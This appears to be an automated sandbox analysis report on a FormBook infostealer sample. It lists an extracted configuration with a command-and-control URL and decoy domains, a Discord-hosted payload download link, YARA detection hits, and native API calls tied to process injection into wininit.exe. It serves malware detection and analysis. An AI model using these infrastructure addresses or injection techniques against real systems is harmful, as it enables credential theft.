Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.111bjs.com/ccr/"], "decoy": ["abdullahlodhi.com", "jevya.com", "knoxvillerestaurant.com", "mekarauroko7389.com", "cricketspowder.net", "johannchirinos.com", "orangeorganical.com", "libero-tt.com", "lorenaegianluca.com", "wintab.net", "modernmillievintage.com", "zgdqcyw.com", "jeffabildgaardmd.com", "nurulfikrimakassar.com", "findyourchef.com", "innovationsservicegroup.com", "destek-taleplerimiz.com", "whfqqco.icu", "kosmetikmadeingermany.com", "dieteticos.net", "savarsineklik.com", "newfashiontrends.com", "e-mobilitysolutions.com", "spaced.ltd", "amjadalitrading.com", "thejstutor.com", "zzhqp.com", "exoticomistico.com", "oklahomasundayschool.com", "grwfrog.com", "elementsfitnessamdwellbeing.com", "auldontoyworld.com", "cumhuriyetcidemokratparti.kim", "thetruthinternational.com", "adimadimingilizce.com", "retreatwinds.com", "duoteshop.com", "jasonkokrak.com", "latindancextreme.com", "agavedeals.com", "motz.xyz", "kspecialaroma.com", "yuejinjc.com", "print12580.com", "ampsports.tennis", "affordablebathroomsarizona.com", "casnop.com", "driftwestcoastmarket.com", "bjsjygg.com", "gwpjamshedpur.com", "reserveacalifornia.com", "caobv.com", "culturaenmistacones.com", "back-upstore.com", "jjsmiths.com", "iamxc.com", "siobhankrittiya.com", "digitalakanksha.com", "koatku.com", "shamushalkowich.com", "merplerps.com", "fishexpertise.com", "sweetheartmart.com", "nqs.xyz"]} |
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp | String found in binary or memory: http://computername/printers/printername/.printer |
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com |
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/ |
Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. |
Source: explorer.exe, 00000008.00000000.2107572712.0000000004F30000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll |
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp | String found in binary or memory: http://treyresearch.net |
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/ |
Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA |
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww |
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe |
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA |
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner |
Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv |
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv. |
Source: msiexec.exe, 00000004.00000002.2097975295.0000000000330000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.2098042878.00000000003BA000.00000004.00000020.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi |
Source: msiexec.exe, 00000004.00000002.2098087183.0000000000566000.00000004.00000001.sdmp, msiexec.exe, 00000004.00000002.2098074405.0000000000466000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qn |
Source: msiexec.exe, 00000004.00000002.2097965804.0000000000324000.00000004.00000040.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qnG |
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F00C4 NtCreateFile,LdrInitializeThunk, | 7_2_008F00C4 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F0048 NtProtectVirtualMemory,LdrInitializeThunk, | 7_2_008F0048 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F0078 NtResumeThread,LdrInitializeThunk, | 7_2_008F0078 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EF9F0 NtClose,LdrInitializeThunk, | 7_2_008EF9F0 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EF900 NtReadFile,LdrInitializeThunk, | 7_2_008EF900 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, | 7_2_008EFAD0 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFAE8 NtQueryInformationProcess,LdrInitializeThunk, | 7_2_008EFAE8 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFBB8 NtQueryInformationToken,LdrInitializeThunk, | 7_2_008EFBB8 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFB68 NtFreeVirtualMemory,LdrInitializeThunk, | 7_2_008EFB68 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFC90 NtUnmapViewOfSection,LdrInitializeThunk, | 7_2_008EFC90 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFC60 NtMapViewOfSection,LdrInitializeThunk, | 7_2_008EFC60 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFD8C NtDelayExecution,LdrInitializeThunk, | 7_2_008EFD8C |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFDC0 NtQuerySystemInformation,LdrInitializeThunk, | 7_2_008EFDC0 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFEA0 NtReadVirtualMemory,LdrInitializeThunk, | 7_2_008EFEA0 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, | 7_2_008EFED0 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFFB4 NtCreateSection,LdrInitializeThunk, | 7_2_008EFFB4 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F10D0 NtOpenProcessToken, | 7_2_008F10D0 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F0060 NtQuerySection, | 7_2_008F0060 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F01D4 NtSetValueKey, | 7_2_008F01D4 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F010C NtOpenDirectoryObject, | 7_2_008F010C |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F1148 NtOpenThread, | 7_2_008F1148 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F07AC NtCreateMutant, | 7_2_008F07AC |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EF8CC NtWaitForSingleObject, | 7_2_008EF8CC |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EF938 NtWriteFile, | 7_2_008EF938 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F1930 NtSetContextThread, | 7_2_008F1930 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFAB8 NtQueryValueKey, | 7_2_008EFAB8 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFA20 NtQueryInformationFile, | 7_2_008EFA20 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFA50 NtEnumerateValueKey, | 7_2_008EFA50 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFBE8 NtQueryVirtualMemory, | 7_2_008EFBE8 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFB50 NtCreateKey, | 7_2_008EFB50 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFC30 NtOpenProcess, | 7_2_008EFC30 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFC48 NtSetInformationFile, | 7_2_008EFC48 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F0C40 NtGetContextThread, | 7_2_008F0C40 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008F1D80 NtSuspendThread, | 7_2_008F1D80 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFD5C NtEnumerateKey, | 7_2_008EFD5C |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFE24 NtWriteVirtualMemory, | 7_2_008EFE24 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFFFC NtCreateProcessEx, | 7_2_008EFFFC |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008EFF34 NtQueueApcThread, | 7_2_008EFF34 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F00C4 NtCreateFile,LdrInitializeThunk, | 9_2_021F00C4 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F07AC NtCreateMutant,LdrInitializeThunk, | 9_2_021F07AC |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFAB8 NtQueryValueKey,LdrInitializeThunk, | 9_2_021EFAB8 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, | 9_2_021EFAD0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFAE8 NtQueryInformationProcess,LdrInitializeThunk, | 9_2_021EFAE8 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFB50 NtCreateKey,LdrInitializeThunk, | 9_2_021EFB50 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFB68 NtFreeVirtualMemory,LdrInitializeThunk, | 9_2_021EFB68 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFBB8 NtQueryInformationToken,LdrInitializeThunk, | 9_2_021EFBB8 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EF900 NtReadFile,LdrInitializeThunk, | 9_2_021EF900 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EF9F0 NtClose,LdrInitializeThunk, | 9_2_021EF9F0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, | 9_2_021EFED0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFFB4 NtCreateSection,LdrInitializeThunk, | 9_2_021EFFB4 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFC60 NtMapViewOfSection,LdrInitializeThunk, | 9_2_021EFC60 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFD8C NtDelayExecution,LdrInitializeThunk, | 9_2_021EFD8C |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFDC0 NtQuerySystemInformation,LdrInitializeThunk, | 9_2_021EFDC0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F0048 NtProtectVirtualMemory, | 9_2_021F0048 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F0078 NtResumeThread, | 9_2_021F0078 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F0060 NtQuerySection, | 9_2_021F0060 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F10D0 NtOpenProcessToken, | 9_2_021F10D0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F010C NtOpenDirectoryObject, | 9_2_021F010C |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F1148 NtOpenThread, | 9_2_021F1148 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F01D4 NtSetValueKey, | 9_2_021F01D4 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFA20 NtQueryInformationFile, | 9_2_021EFA20 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFA50 NtEnumerateValueKey, | 9_2_021EFA50 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFBE8 NtQueryVirtualMemory, | 9_2_021EFBE8 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EF8CC NtWaitForSingleObject, | 9_2_021EF8CC |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EF938 NtWriteFile, | 9_2_021EF938 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F1930 NtSetContextThread, | 9_2_021F1930 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFE24 NtWriteVirtualMemory, | 9_2_021EFE24 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFEA0 NtReadVirtualMemory, | 9_2_021EFEA0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFF34 NtQueueApcThread, | 9_2_021EFF34 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFFFC NtCreateProcessEx, | 9_2_021EFFFC |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFC30 NtOpenProcess, | 9_2_021EFC30 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFC48 NtSetInformationFile, | 9_2_021EFC48 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F0C40 NtGetContextThread, | 9_2_021F0C40 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFC90 NtUnmapViewOfSection, | 9_2_021EFC90 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021EFD5C NtEnumerateKey, | 9_2_021EFD5C |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021F1D80 NtSuspendThread, | 9_2_021F1D80 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099D50 NtCreateFile, | 9_2_00099D50 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099E00 NtReadFile, | 9_2_00099E00 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099E80 NtClose, | 9_2_00099E80 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099F30 NtAllocateVirtualMemory, | 9_2_00099F30 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099DFB NtReadFile, | 9_2_00099DFB |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00099F2B NtAllocateVirtualMemory, | 9_2_00099F2B |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E93CE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, | 9_2_024E93CE |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, | 9_2_024E9862 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E93D2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, | 9_2_024E93D2 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E9DAE NtResumeThread,NtClose, | 9_2_024E9DAE |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008FE0C6 | 7_2_008FE0C6 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0092D005 | 7_2_0092D005 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0091905A | 7_2_0091905A |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00903040 | 7_2_00903040 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008FE2E9 | 7_2_008FE2E9 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009A1238 | 7_2_009A1238 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008FF3CF | 7_2_008FF3CF |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009263DB | 7_2_009263DB |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00902305 | 7_2_00902305 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00907353 | 7_2_00907353 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0094A37B | 7_2_0094A37B |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00935485 | 7_2_00935485 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00911489 | 7_2_00911489 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0093D47D | 7_2_0093D47D |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0091C5F0 | 7_2_0091C5F0 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0090351F | 7_2_0090351F |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00904680 | 7_2_00904680 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0090E6C1 | 7_2_0090E6C1 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009A2622 | 7_2_009A2622 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0098579A | 7_2_0098579A |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0090C7BC | 7_2_0090C7BC |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009357C3 | 7_2_009357C3 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0099F8EE | 7_2_0099F8EE |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0090C85C | 7_2_0090C85C |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0092286D | 7_2_0092286D |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009A098E | 7_2_009A098E |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009029B2 | 7_2_009029B2 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009169FE | 7_2_009169FE |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00985955 | 7_2_00985955 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009B3A83 | 7_2_009B3A83 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_009ACBA4 | 7_2_009ACBA4 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0098DBDA | 7_2_0098DBDA |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_008FFBD7 | 7_2_008FFBD7 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00927B00 | 7_2_00927B00 |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0099FDDD | 7_2_0099FDDD |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00930D3B | 7_2_00930D3B |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0090CD5B | 7_2_0090CD5B |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00932E2F | 7_2_00932E2F |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0091EE4C | 7_2_0091EE4C |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_00910F3F | 7_2_00910F3F |
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 7_2_0092DF7C | 7_2_0092DF7C |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022A1238 | 9_2_022A1238 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021FE2E9 | 9_2_021FE2E9 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02202305 | 9_2_02202305 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0224A37B | 9_2_0224A37B |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02207353 | 9_2_02207353 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022A63BF | 9_2_022A63BF |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021FF3CF | 9_2_021FF3CF |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022263DB | 9_2_022263DB |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0222D005 | 9_2_0222D005 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02203040 | 9_2_02203040 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0221905A | 9_2_0221905A |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021FE0C6 | 9_2_021FE0C6 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022A2622 | 9_2_022A2622 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0224A634 | 9_2_0224A634 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02204680 | 9_2_02204680 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0220E6C1 | 9_2_0220E6C1 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0220C7BC | 9_2_0220C7BC |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0228579A | 9_2_0228579A |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022357C3 | 9_2_022357C3 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0223D47D | 9_2_0223D47D |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02235485 | 9_2_02235485 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02211489 | 9_2_02211489 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0220351F | 9_2_0220351F |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02246540 | 9_2_02246540 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0221C5F0 | 9_2_0221C5F0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022B3A83 | 9_2_022B3A83 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02227B00 | 9_2_02227B00 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022ACBA4 | 9_2_022ACBA4 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_021FFBD7 | 9_2_021FFBD7 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0228DBDA | 9_2_0228DBDA |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0222286D | 9_2_0222286D |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0220C85C | 9_2_0220C85C |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0229F8EE | 9_2_0229F8EE |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02285955 | 9_2_02285955 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022029B2 | 9_2_022029B2 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022A098E | 9_2_022A098E |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_022169FE | 9_2_022169FE |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02232E2F | 9_2_02232E2F |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0221EE4C | 9_2_0221EE4C |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02210F3F | 9_2_02210F3F |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0222DF7C | 9_2_0222DF7C |
